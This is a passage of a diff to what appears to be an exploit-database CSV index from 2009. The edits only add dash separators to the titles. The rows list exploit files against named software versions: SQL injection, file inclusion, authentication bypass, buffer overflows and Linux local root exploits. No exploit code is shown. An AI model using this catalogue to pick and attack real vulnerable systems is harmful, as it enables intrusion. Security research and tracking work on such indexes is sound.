Vulnerabilities",2009-07-27,SirGod,php,webapps,0 -9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 (Cat_ID) SQL Injection (patched?)",2009-07-27,octopos,php,webapps,0 +9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 - (Cat_ID) SQL Injection (patched?)",2009-07-27,octopos,php,webapps,0 9268,platforms/hardware/dos/9268.rb,"Cisco WLC 4402 - Basic Auth Remote Denial of Service (Metasploit)",2009-07-27,"Christoph Bott",hardware,dos,0 9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script - (home.php page) Remote File Inclusion",2009-07-27,int_main();,php,webapps,0 9270,platforms/php/webapps/9270.txt,"Super Mod System 3.0 - (s) SQL Injection",2009-07-27,MizoZ,php,webapps,0 @@ -8753,17 +8753,17 @@ id,file,description,date,author,platform,type,port 9278,platforms/freebsd/remote/9278.txt,"NcFTPd <= 2.8.5 - Remote Jail Breakout",2009-07-27,kingcope,freebsd,remote,0 9279,platforms/php/webapps/9279.pl,"PunBB Automatic Image Upload <= 1.3.5 - Remote SQL Injection Exploit",2009-07-27,Dante90,php,webapps,0 9280,platforms/php/webapps/9280.pl,"PunBB Automatic Image Upload <= 1.3.5 Delete Arbitrary File Exploit",2009-07-27,Dante90,php,webapps,0 -9281,platforms/php/webapps/9281.txt,"Limny 1.01 (Auth Bypass) SQL Injection",2009-07-27,SirGod,php,webapps,0 -9282,platforms/php/webapps/9282.txt,"Magician Blog <= 1.0 (ids) Remote SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0 -9283,platforms/php/webapps/9283.txt,"Magician Blog <= 1.0 (Auth Bypass) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0 +9281,platforms/php/webapps/9281.txt,"Limny 1.01 - (Auth Bypass) SQL Injection",2009-07-27,SirGod,php,webapps,0 +9282,platforms/php/webapps/9282.txt,"Magician Blog <= 1.0 - (ids) Remote SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0 +9283,platforms/php/webapps/9283.txt,"Magician Blog <= 1.0 - (Auth Bypass) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0 9284,platforms/php/webapps/9284.txt,"SerWeb <= 2.1.0-dev1 2009-07-02 - Multiple RFI Vulnerabilities",2009-07-27,GoLd_M,php,webapps,0 9286,platforms/windows/local/9286.pl,"MP3 Studio 1.0 - (.mpf /.m3u) Local Stack Overflow Exploit (SEH)",2009-07-28,corelanc0d3r,windows,local,0 9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script (paidbanner.php ID) SQL Injection",2009-07-28,"ThE g0bL!N",php,webapps,0 -9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 (linkout.php id) SQL Injection",2009-07-28,MizoZ,php,webapps,0 +9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 - (linkout.php id) SQL Injection",2009-07-28,MizoZ,php,webapps,0 9289,platforms/php/webapps/9289.pl,"PunBB Reputation.php Mod <= 2.0.4 - Blind SQL Injection Exploit",2009-07-28,Dante90,php,webapps,0 9290,platforms/php/webapps/9290.txt,"In-Portal 4.3.1 - Arbitrary Shell Upload",2009-07-28,Mr.tro0oqy,php,webapps,0 9291,platforms/windows/local/9291.pl,"MP3 Studio 1.0 - (.mpf) Local BoF Exploit (SEH)",2009-07-28,Koshi,windows,local,0 -9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 +9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 9293,platforms/php/webapps/9293.txt,"PaoBacheca Guestbook 2.1 - (login_ok) Auth Bypass",2009-07-28,SirGod,php,webapps,0 9294,platforms/php/webapps/9294.txt,"PaoLiber 1.1 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 9295,platforms/windows/dos/9295.txt,"Firebird SQL op_connect_request main listener shutdown",2009-07-28,"Core Security",windows,dos,0 @@ -8779,15 +8779,15 @@ id,file,description,date,author,platform,type,port 9305,platforms/windows/local/9305.txt,"EPSON Status Monitor 3 - Local Privilege Escalation",2009-07-30,Nine:Situations:Group,windows,local,0 9306,platforms/aix/local/9306.txt,"IBM AIX 5.3 libc MALLOCDEBUG File Overwrite",2009-07-30,Affix,aix,local,0 9307,platforms/php/webapps/9307.txt,"Ultrize TimeSheet 1.2.2 readfile() Local File Disclosure",2009-07-30,GoLd_M,php,webapps,0 -9308,platforms/php/webapps/9308.txt,"justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities",2009-07-30,SirGod,php,webapps,0 -9309,platforms/php/webapps/9309.txt,"orbis CMS 1.0 (afd/adf/asu/SQL) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 -9310,platforms/php/webapps/9310.txt,"dit.cms 1.3 (path/sitemap/relPath) Local File Inclusion Vulnerabilities",2009-07-30,SirGod,php,webapps,0 +9308,platforms/php/webapps/9308.txt,"justVisual 1.2 - (fs_jVroot) Remote File Inclusion Vulnerabilities",2009-07-30,SirGod,php,webapps,0 +9309,platforms/php/webapps/9309.txt,"orbis CMS 1.0 - (afd/adf/asu/SQL) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 +9310,platforms/php/webapps/9310.txt,"dit.cms 1.3 - (path/sitemap/relPath) Local File Inclusion Vulnerabilities",2009-07-30,SirGod,php,webapps,0 9311,platforms/php/webapps/9311.txt,"cmsphp 0.21 - (LFI/XSS) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 9312,platforms/php/webapps/9312.txt,"d.net CMS - (LFI/sqli) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 9313,platforms/php/webapps/9313.txt,"Really Simple CMS 0.3a (pagecontent.php PT) Local File Inclusion",2009-07-30,SirGod,php,webapps,0 9314,platforms/php/webapps/9314.txt,"MUJE CMS 1.0.4.34 - Local File Inclusion Vulnerabilities",2009-07-30,SirGod,php,webapps,0 9315,platforms/php/webapps/9315.pl,"PunBB Reputation.php Mod <= 2.0.4 - Local File Inclusion Exploit",2009-07-30,Dante90,php,webapps,0 -9316,platforms/php/webapps/9316.txt,"linkSpheric 0.74b6 (listID) Remote SQL Injection",2009-07-30,NoGe,php,webapps,0 +9316,platforms/php/webapps/9316.txt,"linkSpheric 0.74b6 - (listID) Remote SQL Injection",2009-07-30,NoGe,php,webapps,0 9317,platforms/windows/dos/9317.c,"Google SketchUp Pro 7.0 - (.skp) Remote Stack Overflow PoC",2009-08-01,LiquidWorm,windows,dos,0 9318,platforms/windows/remote/9318.py,"VLC Media Player 0.8.6f smb:// URI Handling Remote BoF Exploit (univ)",2009-07-31,His0k4,windows,remote,0 9319,platforms/windows/remote/9319.py,"SAP Business One 2005-A License Manager Remote BoF Exploit",2009-08-01,Bruk0ut,windows,remote,30000 @@ -8804,32 +8804,32 @@ id,file,description,date,author,platform,type,port 9330,platforms/windows/remote/9330.py,"Amaya 11.2 W3C Editor/Browser (defer) Remote BoF Exploit (SEH)",2009-08-03,His0k4,windows,remote,0 9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 - (pda_projects.php offset) RFI",2009-08-03,"cr4wl3r ",php,webapps,0 9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script (Auth Bypass) SQL Injection",2009-08-03,Cicklow,php,webapps,0 -9333,platforms/php/webapps/9333.txt,"Netpet CMS 1.9 (confirm.php language) Local File Inclusion",2009-08-03,SirGod,php,webapps,0 +9333,platforms/php/webapps/9333.txt,"Netpet CMS 1.9 - (confirm.php language) Local File Inclusion",2009-08-03,SirGod,php,webapps,0 9334,platforms/php/webapps/9334.txt,"QuickDev 4 - (download.php file) File Disclosure",2009-08-03,SirGod,php,webapps,0 -9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 (Auth Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0 -9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 (Auth Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0 -9337,platforms/php/webapps/9337.txt,"simplePHPWeb 0.2 (files.php) Authentication Bypass",2009-08-03,SirGod,php,webapps,0 +9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 - (Auth Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0 +9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 - (Auth Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0 +9337,platforms/php/webapps/9337.txt,"simplePHPWeb 0.2 - (files.php) Authentication Bypass",2009-08-03,SirGod,php,webapps,0 9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher (bSQL-XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 9339,platforms/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro - (bSQL/XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 9340,platforms/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - (Auth Bypass) Remote SQL Injection",2009-08-03,snakespc,php,webapps,0 -9342,platforms/php/webapps/9342.txt,"elvin bts 1.2.2 (SQL/XSS) Multiple Vulnerabilities",2009-08-03,"599eme Man",php,webapps,0 +9342,platforms/php/webapps/9342.txt,"elvin bts 1.2.2 - (SQL/XSS) Multiple Vulnerabilities",2009-08-03,"599eme Man",php,webapps,0 9343,platforms/windows/local/9343.pl,"MediaCoder 0.6.2.4275 - (.lst) Stack Buffer Overflow Exploit",2009-08-03,SkuLL-HackeR,windows,local,0 -9344,platforms/php/webapps/9344.txt,"Multi Website 1.5 (index php action) SQL Injection",2009-08-03,SarBoT511,php,webapps,0 +9344,platforms/php/webapps/9344.txt,"Multi Website 1.5 - (index php action) SQL Injection",2009-08-03,SarBoT511,php,webapps,0 9345,platforms/windows/dos/9345.pl,"RadASM 2.2.1.5 - (.mnu) Local Format String PoC",2009-08-03,SkuLL-HackeR,windows,dos,0 9346,platforms/windows/local/9346.pl,"Blaze HDTV Player 6.0 - (.PLF) Local Buffer Overflow Exploit (SEH)",2009-08-03,hack4love,windows,local,0 -9347,platforms/php/webapps/9347.txt,"Arab Portal <= 2.2 (mod.php module) Local File Inclusion",2009-08-03,Qabandi,php,webapps,0 +9347,platforms/php/webapps/9347.txt,"Arab Portal <= 2.2 - (mod.php module) Local File Inclusion",2009-08-03,Qabandi,php,webapps,0 9348,platforms/php/webapps/9348.txt,"Blink Blog System (Auth Bypass) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0 -9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 (index.php more) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0 +9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 - (index.php more) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0 9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b - RFI / File Disclosure Vulnerabilities",2009-08-03,GoLd_M,php,webapps,0 9351,platforms/php/webapps/9351.txt,"Payment Processor Script (shop.htm cid) SQL Injection",2009-08-03,ZoRLu,php,webapps,0 9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0 -9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 (Auth Bypass) SQL Injection",2009-08-04,SirGod,php,webapps,0 +9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - (Auth Bypass) SQL Injection",2009-08-04,SirGod,php,webapps,0 9354,platforms/windows/local/9354.pl,"MediaCoder 0.7.1.4486 - (.lst) Universal Buffer Overflow Exploit (SEH)",2009-08-04,germaya_x,windows,local,0 -9355,platforms/php/webapps/9355.txt,"elgg <= 1.5 (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0 +9355,platforms/php/webapps/9355.txt,"elgg <= 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0 9356,platforms/php/webapps/9356.txt,"shopmaker CMS 2.0 - (bSQL/ LFI) Multiple Vulnerabilities",2009-08-04,PLATEN,php,webapps,0 9357,platforms/cgi/webapps/9357.txt,"Perl$hop e-commerce Script Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0 -9358,platforms/php/webapps/9358.txt,"In-Portal 4.3.1 (index.php env) Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0 +9358,platforms/php/webapps/9358.txt,"In-Portal 4.3.1 - (index.php env) Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0 9359,platforms/windows/dos/9359.pl,"jetAudio 7.1.9.4030 plus vx - (.m3u) Local Buffer Overflow PoC",2009-08-04,hack4love,windows,dos,0 9360,platforms/windows/local/9360.pl,"BlazeDVD 5.1/HDTV Player 6.0 - (.PLF) Universal BoF Exploit (SEH)",2009-08-04,"ThE g0bL!N",windows,local,0 9361,platforms/windows/dos/9361.pl,"RadASM 2.2.1.6 Menu Editor (.mnu) Stack Overflow PoC",2009-08-04,"Pankaj Kohli",windows,dos,0 @@ -8841,8 +8841,8 @@ id,file,description,date,author,platform,type,port 9367,platforms/php/webapps/9367.txt,"tenrok 1.1.0 - (udd/RCE) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 9368,platforms/windows/dos/9368.pl,"UltraPlayer Media Player 2.112 - Local Buffer Overflow PoC",2009-08-05,SarBoT511,windows,dos,0 9369,platforms/php/webapps/9369.txt,"Irokez CMS 0.7.1 - Remote SQL Injection",2009-08-05,Ins3t,php,webapps,0 -9370,platforms/php/webapps/9370.txt,"AccessoriesMe PHP Affiliate Script 1.4 (bSQL-XSS) Multiple Vulnerabilities",2009-08-05,Moudi,php,webapps,0 -9371,platforms/php/webapps/9371.txt,"opennews 1.0 (sqli/rce) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 +9370,platforms/php/webapps/9370.txt,"AccessoriesMe PHP Affiliate Script 1.4 - (bSQL-XSS) Multiple Vulnerabilities",2009-08-05,Moudi,php,webapps,0 +9371,platforms/php/webapps/9371.txt,"opennews 1.0 - (sqli/rce) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 9372,platforms/php/webapps/9372.txt,"Portel 2008 - (decide.php patron) Blind SQL Injection",2009-08-05,"Chip d3 bi0s",php,webapps,0 9373,platforms/freebsd/dos/9373.c,"FreeBSD 7.2-RELEASE - SCTP Local Kernel Denial of Service Exploit",2009-08-06,"Shaun Colley",freebsd,dos,0 9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 - (.m3u) Universal Stack Overflow Exploit (SEH)",2009-08-06,Dr_IDE,windows,local,0 @@ -8850,29 +8850,29 @@ id,file,description,date,author,platform,type,port 9377,platforms/windows/local/9377.pl,"A2 Media Player Pro 2.51 - (.m3u /m3l) Universal Local BoF Exploit (SEH)",2009-08-06,hack4love,windows,local,0 9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster (Topic Delete/XSS) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0 9379,platforms/windows/local/9379.pl,"Playlistmaker 1.5 - (.M3U/M3L) Local Stack Overflow Exploit (seh)",2009-08-06,germaya_x,windows,local,0 -9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 (showUid) Remote SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0 +9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) Remote SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0 9381,platforms/windows/dos/9381.py,"Groovy Media Player 1.2.0 - (.m3u) Local Buffer Overflow PoC",2009-08-06,"opt!x hacker",windows,dos,0 9382,platforms/windows/dos/9382.txt,"ImTOO MPEG Encoder 3.1.53 - (.cue/.m3u) Local Buffer Overflow PoC",2009-08-06,"opt!x hacker",windows,dos,0 -9383,platforms/php/webapps/9383.txt,"LM Starmail 2.0 (SQL Injection/File Inclusion) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0 +9383,platforms/php/webapps/9383.txt,"LM Starmail 2.0 - (SQL Injection/File Inclusion) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0 9384,platforms/php/webapps/9384.txt,"Alwasel 1.5 - Multiple Remote SQL Injection Vulnerabilities",2009-08-07,SwEET-DeViL,php,webapps,0 -9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery <= 1.0 (Auth Bypass) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0 +9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery <= 1.0 - (Auth Bypass) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0 9386,platforms/windows/local/9386.txt,"Steam 54/894 - Local Privilege Escalation",2009-08-07,MrDoug,windows,local,0 9387,platforms/php/webapps/9387.txt,"Banner Exchange Script 1.0 - (targetid) Blind SQL Injection",2009-08-07,"599eme Man",php,webapps,0 -9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 (forumid) Remote SQL Injection",2009-08-07,Ruzgarin_Oglu,php,webapps,0 -9390,platforms/php/webapps/9390.txt,"Typing Pal <= 1.0 (idTableProduit) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0 +9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 - (forumid) Remote SQL Injection",2009-08-07,Ruzgarin_Oglu,php,webapps,0 +9390,platforms/php/webapps/9390.txt,"Typing Pal <= 1.0 - (idTableProduit) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0 9392,platforms/windows/dos/9392.pl,"iRehearse - (.m3u) Local Buffer Overflow PoC",2009-08-07,"opt!x hacker",windows,dos,0 -9393,platforms/windows/dos/9393.pl,"FoxPlayer 1.1.0 (m3u File) Local Buffer Overflow PoC",2009-08-07,"opt!x hacker",windows,dos,0 -9394,platforms/php/webapps/9394.pl,"Arab Portal 2.2 (Auth Bypass) Blind SQL Injection Exploit",2009-08-07,"Jafer Al Zidjali",php,webapps,0 +9393,platforms/windows/dos/9393.pl,"FoxPlayer 1.1.0 - (m3u File) Local Buffer Overflow PoC",2009-08-07,"opt!x hacker",windows,dos,0 +9394,platforms/php/webapps/9394.pl,"Arab Portal 2.2 - (Auth Bypass) Blind SQL Injection Exploit",2009-08-07,"Jafer Al Zidjali",php,webapps,0 9395,platforms/php/webapps/9395.txt,"PHPCityPortal (Auth Bypass) Remote SQL Injection",2009-08-07,CoBRa_21,php,webapps,0 9396,platforms/php/webapps/9396.txt,"Facil Helpdesk - (RFI/LFI/XSS) Multiples Remote Vulnerabilities",2009-08-07,Moudi,php,webapps,0 9397,platforms/php/webapps/9397.txt,"IsolSoft Support Center 2.5 - (RFI/LFI/XSS) Multiples Vulnerabilities",2009-08-07,Moudi,php,webapps,0 -9398,platforms/php/webapps/9398.php,"Joomla Component com_pms 2.0.4 (Ignore-List) SQL Injection Exploit",2009-08-07,M4dhead,php,webapps,0 -9399,platforms/php/webapps/9399.txt,"Logoshows BBS 2.0 (Auth Bypass) SQL Injection",2009-08-07,Dns-Team,php,webapps,0 +9398,platforms/php/webapps/9398.php,"Joomla Component com_pms 2.0.4 - (Ignore-List) SQL Injection Exploit",2009-08-07,M4dhead,php,webapps,0 +9399,platforms/php/webapps/9399.txt,"Logoshows BBS 2.0 - (Auth Bypass) SQL Injection",2009-08-07,Dns-Team,php,webapps,0 9400,platforms/php/webapps/9400.txt,"logoshows bbs 2.0 - (DD/ich) Multiple Vulnerabilities",2009-08-07,ZoRLu,php,webapps,0 9401,platforms/windows/dos/9401.py,"Spiceworks 3.6 Accept Parameter Overflow Crash Exploit",2009-08-07,"David Kennedy (ReL1K)",windows,dos,0 -9404,platforms/php/webapps/9404.txt,"SmilieScript <= 1.0 (Auth Bypass) SQL Injection",2009-08-10,Mr.tro0oqy,php,webapps,0 +9404,platforms/php/webapps/9404.txt,"SmilieScript <= 1.0 - (Auth Bypass) SQL Injection",2009-08-10,Mr.tro0oqy,php,webapps,0 9405,platforms/php/webapps/9405.txt,"Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution",2009-08-10,"RedTeam Pentesting",php,webapps,0 -9406,platforms/php/webapps/9406.txt,"Mini-CMS 1.0.1 (page.php id) SQL Injection",2009-08-10,Ins3t,php,webapps,0 +9406,platforms/php/webapps/9406.txt,"Mini-CMS 1.0.1 - (page.php id) SQL Injection",2009-08-10,Ins3t,php,webapps,0 9407,platforms/php/webapps/9407.txt,"CMS Made Simple <= 1.6.2 - Local File Disclosure",2009-08-10,IHTeam,php,webapps,0 9408,platforms/php/webapps/9408.php,"Joomla Component Kunena Forums (com_kunena) bSQL Injection Exploit",2009-08-10,"ilker Kandemir",php,webapps,0 9409,platforms/windows/local/9409.pl,"MediaCoder 0.7.1.4490 - (.lst/.m3u) Universal BoF Exploit (SEH)",2009-08-10,hack4love,windows,local,0 @@ -8880,7 +8880,7 @@ id,file,description,date,author,platform,type,port 9411,platforms/windows/dos/9411.cpp,"Embedthis Appweb 3.0b.2-4 - Remote Buffer Overflow PoC",2009-08-11,"fl0 fl0w",windows,dos,0 9412,platforms/windows/local/9412.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH)",2009-08-11,ahwak2000,windows,local,0 9413,platforms/php/webapps/9413.txt,"Joomla Component idoblog 1.1b30 (com_idoblog) - SQL Injection",2009-08-11,kkr,php,webapps,0 -9416,platforms/php/webapps/9416.txt,"OCS Inventory NG 1.2.1 (systemid) SQL Injection",2009-08-11,"Guilherme Marinheiro",php,webapps,0 +9416,platforms/php/webapps/9416.txt,"OCS Inventory NG 1.2.1 - (systemid) SQL Injection",2009-08-11,"Guilherme Marinheiro",php,webapps,0 9417,platforms/windows/dos/9417.txt,"Microsoft Windows 2003 - (EOT File) BSOD Crash Exploit",2009-08-11,webDEViL,windows,dos,0 9418,platforms/windows/local/9418.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (2)",2009-08-11,"ThE g0bL!N",windows,local,0 9419,platforms/php/webapps/9419.txt,"Shorty 0.7.1b (Auth Bypass) Insecure Cookie Handling",2009-08-12,"Pedro Laguna",php,webapps,0 @@ -8896,14 +8896,14 @@ id,file,description,date,author,platform,type,port 9429,platforms/windows/dos/9429.py,"EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflow PoC",2009-08-13,Dr_IDE,windows,dos,0 9430,platforms/php/webapps/9430.pl,"JBLOG 1.5.1 - Remote SQL Table Backup Exploit",2009-08-13,Ams,php,webapps,0 9431,platforms/php/webapps/9431.txt,"WordPress Plugin WP-Syntax <= 0.9.1 - Remote Command Execution",2009-08-27,Raz0r,php,webapps,0 -9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 (user.ini) Arbitrary Download",2009-08-13,"aBo MoHaMeD",hardware,remote,0 +9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 - (user.ini) Arbitrary Download",2009-08-13,"aBo MoHaMeD",hardware,remote,0 9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Remote Arbitrary Shell Upload",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0 -9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x (XSS/SQL/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0 +9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x - (XSS/SQL/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0 9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x (Redhat) - 'sock_sendpage()' Ring0 Local Root Exploit (1)",2009-08-14,spender,linux,local,0 9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (4)",2009-08-14,"Przemyslaw Frasunek",linux,local,0 -9437,platforms/php/webapps/9437.txt,"Ignition 1.2 (comment) Remote Code Injection",2009-08-14,"Khashayar Fereidani",php,webapps,0 +9437,platforms/php/webapps/9437.txt,"Ignition 1.2 - (comment) Remote Code Injection",2009-08-14,"Khashayar Fereidani",php,webapps,0 9438,platforms/php/webapps/9438.txt,"PHP Competition System <= 0.84 - (competition) SQL Injection",2009-08-14,Mr.SQL,php,webapps,0 -9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 (nFileId) Remote SQL Injection",2009-08-14,Mr.tro0oqy,php,webapps,0 +9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 - (nFileId) Remote SQL Injection",2009-08-14,Mr.tro0oqy,php,webapps,0 9441,platforms/php/webapps/9441.txt,"MyWeight 1.0 - Remote Shell Upload",2009-08-14,Mr.tro0oqy,php,webapps,0 9442,platforms/linux/dos/9442.c,"Linux Kernel < 2.6.30.5 cfg80211 - Remote Denial of Service Exploit",2009-08-18,"Jon Oberheide",linux,dos,0 9443,platforms/windows/remote/9443.txt,"Adobe JRun 4 - (logfile) Directory Traversal (Auth)",2009-08-18,DSecRG,windows,remote,0 @@ -8913,9 +8913,9 @@ id,file,description,date,author,platform,type,port 9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - (store.php id) SQL Injection Exploit",2009-08-18,NoGe,php,webapps,0 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0 9449,platforms/windows/dos/9449.txt,"TheGreenBow VPN Client tgbvpn.sys Local DoS Exploit",2009-08-18,Evilcry,windows,dos,0 -9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 (RCE/CSRF/LFI/XSS) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0 +9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - (RCE/CSRF/LFI/XSS) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0 9451,platforms/php/webapps/9451.txt,"Dreampics Builder (exhibition_id) Remote SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 -9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 (article) Blind SQL Injection Exploit",2009-08-18,Mr.SQL,php,webapps,0 +9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection Exploit",2009-08-18,Mr.SQL,php,webapps,0 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9454,platforms/multiple/dos/9454.txt,"Safari 4.0.2 - (WebKit Parsing of Floating Point Numbers) BoF PoC",2009-08-18,"Leon Juranic",multiple,dos,0 9455,platforms/windows/dos/9455.html,"Microsoft Internet Explorer (Javascript SetAttribute) Remote Crash Exploit",2009-08-18,"Irfan Asrar",windows,dos,0 @@ -8924,7 +8924,7 @@ id,file,description,date,author,platform,type,port 9458,platforms/windows/local/9458.pl,"Xenorate Media Player 2.6.0.0 - (.xpl) Universal Local Buffer Exploit (SEH)",2009-08-18,hack4love,windows,local,0 9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Auth Bypass & Password Reset Vulnerabilities (2)",2009-08-18,bugz,php,webapps,0 9460,platforms/php/webapps/9460.txt,"autonomous lan party <= 0.98.3 - Remote File Inclusion",2009-08-18,"cr4wl3r ",php,webapps,0 -9461,platforms/php/webapps/9461.txt,"E CMS <= 1.0 (index.php s) Remote SQL Injection",2009-08-18,Red-D3v1L,php,webapps,0 +9461,platforms/php/webapps/9461.txt,"E CMS <= 1.0 - (index.php s) Remote SQL Injection",2009-08-18,Red-D3v1L,php,webapps,0 9462,platforms/php/webapps/9462.txt,"Infinity <= 2.x.x - options[style_dir] Local File Disclosure",2009-08-18,SwEET-DeViL,php,webapps,0 9463,platforms/php/webapps/9463.php,"Joomla Component MisterEstate Blind SQL Injection Exploit",2009-08-18,jdc,php,webapps,0 9464,platforms/php/webapps/9464.txt,"Fotoshow PRO (category) Remote SQL Injection",2009-08-18,darkmasking,php,webapps,0 @@ -8941,10 +8941,10 @@ id,file,description,date,author,platform,type,port 9475,platforms/php/webapps/9475.txt,"asaher pro 1.0.4 - Remote Database Backup",2009-08-18,alnjm33,php,webapps,0 9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0 9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0 -9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80 +9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80 9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (5)",2009-08-24,"INetCop Security",linux,local,0 9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0 -9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0 +9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) Remote SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0 9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Auth Bypass) Insecure Cookie Handling",2009-08-24,Mr.tro0oqy,php,webapps,0 9483,platforms/windows/local/9483.pl,"Photodex 